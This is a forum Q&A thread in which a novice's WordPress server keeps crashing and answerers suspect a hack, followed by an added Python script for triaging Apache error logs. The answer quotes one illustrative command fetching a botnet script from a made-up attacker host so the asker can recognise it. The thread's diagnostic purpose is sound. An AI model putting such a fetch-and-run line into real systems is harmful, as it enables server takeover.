
Possible Duplicate:
My server’s been hacked EMERGENCY

Okay, I'm a noobie. I know how to build and compose a website, but I have no idea what I'm doing when it comes to servers and server commands, etc.

I've recently had a problem with all of my sites on our servers going down all at once and then I have to go in and reboot the server for them to come up again. At first this was annoying, but now it is becoming agonizing as it now takes 3-4 reboots for the websites to come back up.

I contacted support for my hosting, but they are not being very helpful. They just keep telling me what the issue might be and basically telling me that I'm going to have to look into it and figure it out, which really isn't possible since I know nothing.

Anyway, here are the things they said were possible reasons:

  1. They said I have "strange logs" in my Apache webserver log, error: sh: fetch: command not found.

  2. My php.ini memory limit is: 256M which is very high. It should be 32M or 64M.

  3. Server is reaching Max Clients, meaning we have more than 150 visitors at a time. (They supposedly "fixed" this, but the sites/server are still going down)

  4. I have some Wordpress sites with plugins getting errors like:

    • PHP Warning: pack(): Type H: illegal hex digit G in...
    • PHP Fatal error: Cannot use object of type stdClass as array in...
    • PHP Fatal error: Maximum execution time of 30 seconds exceeded in...
    • PHP Fatal error: Call to undefined function file_exists() in...
    • PHP Parse error: syntax error, unexpected '<'

I know that's a lot, but I really am at my wits' end and have no idea what to do now. If anyone could maybe give me some advice or point me in the right direction I would greatly appreciate it! Thanks!

Oh, and here are the specs for my server:

  • RAM: 2048MB
  • CPU Shares: 40
  • Primary Disk: 50GB
  • Data Transfer: 75GB
  • Port Speed: 5Mbps
  • Type: Linux

  • My first guess would be that your WordPress installation(s) got hacked. – user16081-JoeT Nov 15 '12 at 15:53
  • There's something **very** wrong with your install if `file_exists()` doesn't exist. It's been in core since PHP4. – ceejayoz Nov 15 '12 at 15:56
  • What has changed recently? Have you run any updates? What's the history like? Has this server been working fine for XXX days and now all of a sudden it stopped working? Or are these errors you have encountered while trying to build the solution? – Safado Nov 15 '12 at 15:57
  • Check compatibility issues: i.e. are the PHP and/or MySQL versions on your server compatible with WordPress's requirements? – Doka Nov 15 '12 at 15:54
  • Definitely sounds like you've been compromised. I bet if you look at some of the PHP files throwing odd errors you'll see "strange" code in them. Time for a sledgehammer and reinstall from known clean backups / packages... – voretaq7 Nov 15 '12 at 17:30

1 Answer

Some of my thoughts ...

  1. "fetch", in its simplest form, allows you to make a GET request from the command line. If you're finding it in the Apache logs, I'm guessing it's something like the shell_exec() function, yet the shell has no idea what "fetch" is, either because it doesn't exist or it's not within its known PATH variable. The Apache log should show you what the offending file is that tried executing it. Look at the file and see if this code is something you expect, or if it's something like "fetch http://hackz0r.ru/add-server-to-botnet.php" or something like that. Is it legit?
  2. 256M is pretty high (128M is the current default) but it really depends on the needs of your application. If you have a script that parses A LOT of information at once and uses 200M to do it, well then I would say that 256M is just right (although you might consider looking at optimizing). Really, that limit sets a barrier on how much RAM an individual script can use. So having it at 256M may not be the end of the world.
  3. If you have the horsepower, raise your Max clients. This dictates how many connections Apache can handle. Enable server-status and check out your stats to get a better idea of what it's talking about. You have to look at your traffic (demand) and see whether you're reaching your limit (supply). If you are, then raise the limit. But before you raise the limit, make sure your server can handle it (CPU, RAM, Network).
  4. Those errors definitely show that something is wrong. As ceejayoz said, file_exists() has been in core since PHP4, so if it doesn't know what that function is, you either have a really old version of PHP, or something is broken. The execution time reaching 30 seconds is a setting in php.ini that dictates how long a single script can run. If it reaches that limit, it stops the script. So something within your app took longer than 30 seconds to do its job, so the command stopped.

It is possible that you got hacked, but it is also very possible that this server was put together very poorly. You should look into some monitoring software, like Nagios, WhatsUp Gold, Munin, SolarWinds, etc., which can help you analyze these types of problems. Read through your Apache log and look for suspicious items. Don't rely on your host to do it. If you don't know how, then I suggest you either learn how, or you hire someone else to manage the server for you.

Safado
  • Since it sounds like things had originally worked fine (and still sometimes do, apparently), IMO it's much more likely he got hacked. I see it with out-of-date WordPress installations often. – user16081-JoeT Nov 15 '12 at 16:26
  • Yeah, you're probably right. – Safado Nov 15 '12 at 16:31
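
A first pass over the Apache error log that the answer and comments recommend reading, as an added example that is not part of the original thread: it separates bare shell-stderr lines (a sign that PHP code is spawning shell commands) from PHP errors, and ranks the scripts named in those errors so you know which files to open first. The log lines, paths and client addresses are constructed, and the line formats assume an Apache 2.2-style `error_log`.

```python
import re
from collections import Counter, defaultdict

# Constructed sample lines in Apache 2.2 error_log style; paths and IPs are made up.
SAMPLE_LOG = """\
[Thu Nov 15 15:40:01 2012] [error] [client 203.0.113.7] PHP Parse error:  syntax error, unexpected '<' in /var/www/site1/wp-content/plugins/example-a/init.php on line 3
sh: fetch: command not found
[Thu Nov 15 15:40:05 2012] [error] [client 203.0.113.7] PHP Fatal error:  Call to undefined function file_exists() in /var/www/site1/wp-content/plugins/example-a/init.php on line 9
sh: fetch: command not found
[Thu Nov 15 15:41:10 2012] [error] [client 198.51.100.4] PHP Fatal error:  Maximum execution time of 30 seconds exceeded in /var/www/site2/wp-includes/example-b.php on line 120
[Thu Nov 15 15:41:12 2012] [error] server reached MaxClients setting, consider raising the MaxClients setting
"""

# stderr of a shell spawned by the web server is logged as a bare line, no [timestamp] prefix.
SHELL_MISS = re.compile(r"^(?:sh|bash): (?:(?:line )?\d+: )?(\S+): (?:command )?not found")
# PHP messages name the script and line they came from.
PHP_ERR = re.compile(r"PHP (Warning|Notice|Fatal error|Parse error):\s+(.*?) in (\S+) on line (\d+)")

def triage(log_text):
    """Return (commands the shell could not find, PHP error kinds per file, MaxClients hits)."""
    shell_cmds, php_by_file, maxclients = Counter(), defaultdict(Counter), 0
    for line in log_text.splitlines():
        m = SHELL_MISS.match(line)
        if m:
            shell_cmds[m.group(1)] += 1
            continue
        m = PHP_ERR.search(line)
        if m:
            php_by_file[m.group(3)][m.group(1)] += 1
        elif "reached MaxClients" in line:
            maxclients += 1
    return shell_cmds, php_by_file, maxclients

def files_to_inspect(php_by_file):
    """Scripts with parse or fatal errors, worst first: open these and read the code."""
    score = lambda kinds: kinds["Parse error"] + kinds["Fatal error"]
    ranked = sorted(php_by_file.items(), key=lambda kv: (-score(kv[1]), kv[0]))
    return [path for path, kinds in ranked if score(kinds) > 0]

if __name__ == "__main__":
    cmds, by_file, hits = triage(SAMPLE_LOG)
    print("shell commands not found:", dict(cmds))
    print("MaxClients warnings:", hits)
    for path in files_to_inspect(by_file):
        print("inspect:", path, dict(by_file[path]))
```

To run it against a real log, pass the file's contents to `triage()` instead of `SAMPLE_LOG`; compare any file it lists against a known clean copy of the same WordPress or plugin version.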